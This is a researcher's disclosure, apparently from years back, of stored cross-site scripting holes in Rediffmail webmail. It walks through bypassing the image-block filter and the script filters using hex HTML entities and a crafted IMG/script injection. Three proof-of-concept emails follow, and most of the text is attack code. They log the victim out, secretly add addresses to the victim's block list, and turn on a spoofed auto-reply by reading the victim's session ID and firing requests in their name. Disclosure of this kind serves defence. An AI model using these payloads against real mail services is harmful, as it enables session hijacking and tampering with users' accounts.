------------------------------------------
                      More Vulnerabilities In Rediffmail.com
                    ------------------------------------------
                           - Viper [ viper31337@yahoo.co.in ]
                             aka JunkCode / Gregory R. Panakkal
                           - http://www.crapware.tk

About Vendor: Rediff.com
------------------------
Rediffmail.com from Rediff, is a premier portal in India, with a very large user-base. Rediffmail is among the few e-mail providers that provides 1GB freespace. A vunerability that affects such a provider, is critical to the users.

About Rediffmail.com
--------------------
Ever since my last vulnerability report regarding Rediff, they have made drastic changes to the webmail interface, adding script-filters, image-filters etc.. in an attempt to avoid furter attacks.

THIS REPORT PRESENTS EXPLOIT/CODES TO BYPASS THESE FILTERS, AND ALSO PRESENTS THREE POSSIBLE ATTACKS OF THE REDIFFMAIL (WEBAMAIL) USERS.


#################################
#                               #
# BYPASSING IMAGE-BLOCK FILTERS #
#                               #
#################################

The images in a mail are blocked by default. This has been implemented by Rediffmail for security reasons, to avoid web-bugs etc.. that can be used to track a user.

This image-block filter can be bypassed in case the user uses Internet Explorer. The following, causes the web-bug to get loaded (and display momentarily, if its a picture).


<img dynsrc="blah-blah" src="http://www.server.com/path/to/webbug.cgi">



############################
#                          #
# BYPASSING SCRIPT FILTERS #
#                          #
############################

Rediffmail does its script filtering in a variety of ways, by inserting '-' (hyphen) in between the letters of html/script tags like <script>, javascript, expression() etc.. It does manage to handle the Amp-Hash (&#) encoding, and hence filters out most of the attempts to get javascript executed.

But as in most cases, to overlook the various obvious methods to get script executed, happens in this case also. Rediffmail has totally forgotten to take care of the Amp-Hash-Hex (&#x) encoding. Hence, the following codes, manages to get javascript executed.

<div style="background-image: url(jav&#x0061;scr&#x0069;pt:alert('hello'));">

<link rel="stylesheet" href="jav&#x0061;scr&#x0069;pt:alert('hello')">

<p style="width:ex&#x0070;ression(alert('hello'))">

<div style="width:ex&#x0070;ression(alert('hello'))">

<input type="image" dynsrc="jav&#x0061;scr&#x0069;pt:alert('hello')">


Now, as you can see, it is still easy to bypass the script-filtering in Rediffmail, and expose all the webmail-interface users to the risk.

Since, its so lame, i decided to pose myself a challenge, to actually get <script> .. </script> to get embedded in the mail when viewed (html-source) by the user. I hope you get the idea, ie. this is to be done by totally avoiding functions like document.write() etc..


Now, while i was looking at a way to get '<script>' injected into the html-source, i noticed that Rediffmail, does convert Amp-Hash encoded characters to its normal readable form. And hence, i started playing around this, combined with the code i used for bypassing image-block filter. After some time, i did manage to get <script> injected into the code...




the code, that was used in the mail sent to rediffmail account was...

--START/CODE--

<IMG width="0" height="0" src=<script> <script>

--END/CODE--


which got converted to the following form, when viewed from the webmail interface..


--START/CODE--

<IMG width="0" height="0" src=http://immail.rediff.com/icons/rediff_mail_gold/grayblock.gif > <script>

--END/CODE--



Now, the only step remaining was to get </script> also injected, and a very similar approach was taken.


Now, the whole combined code that is to be sent to the rediffmail account is...


--START/CODE--

<IMG width="0" height="0" src=<script> <script>

alert(123); //multiple javascript code can be inserted in the space.

abc='<IMG width="0" height="0" src=";</script> ';</script>

--END/CODE--


which gets converted on the webmail side as..


--START/CODE--

<IMG width="0" height="0" src=http://immail.rediff.com/icons/rediff_mail_gold/grayblock.gif > <script>

alert(123);

abc='<IMG width="0" height="0" src="http://immail.rediff.com/icons/rediff_mail_gold/grayblock.gif"> ';</script>

--END/CODE--


You might wonder, why is a variable 'abc' has been inserted, towards the end, before the </script. Well, the reason is simple. But i'll leave it as 'food for the thought' for you. :-)



######################
#                    #
# ATTACKS / EXPLOITS #
#                    #
######################


Here, I'll give out three possible attacks (other than login-spoof) on the Rediffmail Users, caused due to improper filtering of the scripts.

1. Remote Attacker Can Terminate Sessions
2. Remote Attacker Can Block Emails From Reaching Inbox.
3. Remote Attacker Can Enable Auto-Reply Option (Spoofing Reply).


=========================================
1. Remote Attacker Can Terminate Sessions
=========================================

A Remote Attacker can cause a target user's session to terminate when the target user view a mail sent by the remote attacker. When, he/she tries to view the mail, the person is immediately logged out.


Proof Of Concept
----------------
<HTML>
<BODY>
<DIV>REDIFF LOGOUT TEST</DIV>
<DIV>&nbsp;</DIV>

<IMG width="0" height="0" src=<script> <script>

do_logout();

abc='<IMG width="0" height="0" src=";</script> ';</script>

</BODY>
</HTML>



=======================================================
2. Remote Attacker Can Block Emails From Reaching Inbox
=======================================================

A Remote Attacker, can add any email address to the block-list (feature of rediffmail), without the knowledge of the target user. The target user, has to just view the email sent by the remote attacker using javascript enabled browser. It may be long before the target user notices that a particular email-addr has bee added to the block list.


Proof Of Concept
----------------
<HTML>
<BODY>
<DIV>REDIFF EMAIL BLOCK TEST</DIV>
<DIV>&nbsp;</DIV>

<IMG width="0" height="0" src=<script> <script>

var email2block = "hello@world.com";

function middleString(fullString, startString, endString)
{
   if (fullString.indexOf(startString) == -1)
   {
      return "";
   }
   else
  {
      var sub = fullString.substring(fullString.indexOf(startString)+startString.length, fullString.length);
      if (sub.indexOf(endString) == -1)
      {
         return sub;
      }
      else
      {
         return (sub.substring(0, sub.indexOf(endString)));
      }
   }
}

var login     = middleString(document.body.innerHTML, "&login=", "&session_id=");
var sessionid = middleString(document.body.innerHTML, "&session_id=", "&SrtFld=");
var link = "/bn/preferences.cgi?login="+login+"&session_id="+sessionid+"&formname=editblock&blockmail="+email2block+"&del=Block";

imgs = unescape("%3Cimg%20src%3D");

document.write(imgs+'"'+link+'" height=0 width=0>');

abc='<IMG width="0" height="0" src=";</script> ';</script>

</BODY>
</HTML>




================================================================
3. Remote Attacker Can Enable Auto-Reply Option (Spoofing Reply)
================================================================

A Remote Attacker, can spoof replies to mail sent to a target user's account. This attack, can be viewed as a social-engg attack, in which a Email-Changed notification mail can be sent.


Proof Of Concept
----------------
<HTML>
<BODY>
<DIV>REDIFF VACATION REPLY TEST</DIV>
<DIV>&nbsp;</DIV>

<IMG width="0" height="0" src=<script> <script>

var subj = "Email Changed!";
var msg = "my email has changed to abc@abc.com";

function middleString(fullString, startString, endString)
{
   if (fullString.indexOf(startString) == -1)
   {
      return "";
   }
   else
  {
      var sub = fullString.substring(fullString.indexOf(startString)+startString.length, fullString.length);
      if (sub.indexOf(endString) == -1)
      {
         return sub;
      }
      else
      {
         return (sub.substring(0, sub.indexOf(endString)));
      }
   }
}

var login     = middleString(document.body.innerHTML, "&login=", "&session_id=");
var sessionid = middleString(document.body.innerHTML, "&session_id=", "&SrtFld=");
var link = "/bn/preferences.cgi?login="+login+"&session_id="+sessionid+"&formname=editvacation&auto_subj="+subj+"&automsg="+msg+"&autoresponder=1";

imgs = unescape("%3Cimg%20src%3D");

document.write(imgs+'"'+link+'" height=0 width=0>');

abc='<IMG width="0" height="0" src=";</script> ';</script>

</BODY>
</HTML>


############
#          #
# SOLUTION #
#          #
############

Client Side : Disable Active Scripting
Server Side : Implement The Perfect Script Filtering. :)